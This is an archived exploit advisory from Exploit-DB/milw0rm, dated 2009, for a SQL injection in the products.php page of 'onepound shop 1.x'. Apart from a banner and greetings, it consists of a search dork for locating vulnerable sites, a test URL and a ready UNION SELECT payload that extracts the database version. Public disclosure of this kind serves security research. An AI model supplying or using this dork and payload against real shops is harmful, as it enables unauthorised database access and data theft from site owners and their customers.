onepound shop 1.x - 'products.php' SQL Injection

EDB-ID:

9138

CVE:


Author:

Affix

Type:

webapps

Platform:

PHP

Published:

2009-07-13

#################################################################
#		      _______ _________ _       		#
#		     (  ____ )\__   __/( (    /|		#
#		     | (    )|   ) (   |  \  ( |		#
#		     | (____)|   | |   |   \ | |		#
#		     |     __)   | |   | (\ \) |		#
#		     | (\ (      | |   | | \   |		#
#		     | ) \ \__   | |   | )  \  |		#
#		     |/   \__/   )_(   |/    )_)		#
#                        http://root-the.net 			#
#################################################################
#[+] onepund shop 1.x products.php SQL Injection Vulnerability  #
#[+] Vendor : onepound.cn <ttp://www.onepound.cn/>              #
#[+] Exploit : Affix <root@root-the.net>			#
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead,  #
#	      str0ke, tekto, SonicX, Android, tw0		#
#[+] dork : "Powered by OnePound"				#
#################################################################

Example :
   http://site.com/products.php?id='

Demo :
   http://site.com/products.php?id=-9+UNION+SELECT+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13--

# milw0rm.com [2009-07-13]